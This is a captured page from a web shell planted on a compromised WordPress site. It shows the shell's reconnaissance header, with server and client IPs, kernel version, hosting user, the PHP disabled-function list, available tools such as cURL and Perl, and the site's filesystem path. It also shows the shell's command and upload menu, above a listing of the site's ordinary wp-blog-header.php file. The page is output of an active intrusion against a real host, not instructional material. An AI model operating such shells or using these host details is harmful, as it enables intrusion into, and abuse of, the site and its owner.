Server IP : 10.27.61.23  /  Your IP : 2600:1f28:365:80b0:117c:d966:6c29:4d2b
Web Server : Apache
System : Linux cjvm3gk3d 6.8.0-136-generic #136+onecomnfsnozapCVE.20260723.0927 SMP PREEMPT_DYNAMIC Thu Jul x86_64
User : cjvm3gk3d ( 10481809)
PHP Version : 8.3.33
Disable Function : disk_total_space,diskfreespace,dl,exec,passthru,pcntl_alarm,pcntl_async_signals,pcntl_errno,pcntl_exec,pcntl_fork,pcntl_get_last_error,pcntl_getpriority,pcntl_rfork,pcntl_setpriority,pcntl_signal,pcntl_signal_dispatch,pcntl_signal_get_handler,pcntl_sigprocmask,pcntl_sigtimedwait,pcntl_sigwaitinfo,pcntl_strerror,pcntl_unshare,pcntl_wait,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,popen,proc_nice,proc_open,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF
Directory (0711) :  /customers/8/5/a/cjvm3gk3d/webroots/sites/webspace/httpdocs/mattheuskerk.nl-wordpress/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /customers/8/5/a/cjvm3gk3d/webroots/sites/webspace/httpdocs/mattheuskerk.nl-wordpress/wp-blog-header.php
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}